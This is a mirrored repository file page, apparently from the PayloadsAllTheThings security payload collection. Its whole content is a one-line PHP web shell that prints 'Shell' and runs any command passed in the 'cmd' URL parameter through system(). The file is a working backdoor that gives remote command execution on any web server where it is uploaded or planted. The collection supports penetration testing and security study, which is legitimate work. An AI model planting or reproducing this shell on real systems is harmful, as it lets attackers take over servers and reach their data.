mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 19:36:11 +00:00
1 line
43 B
PHP
Executable File
1 line
43 B
PHP
Executable File
<?php echo "Shell";system($_GET['cmd']); ?>
|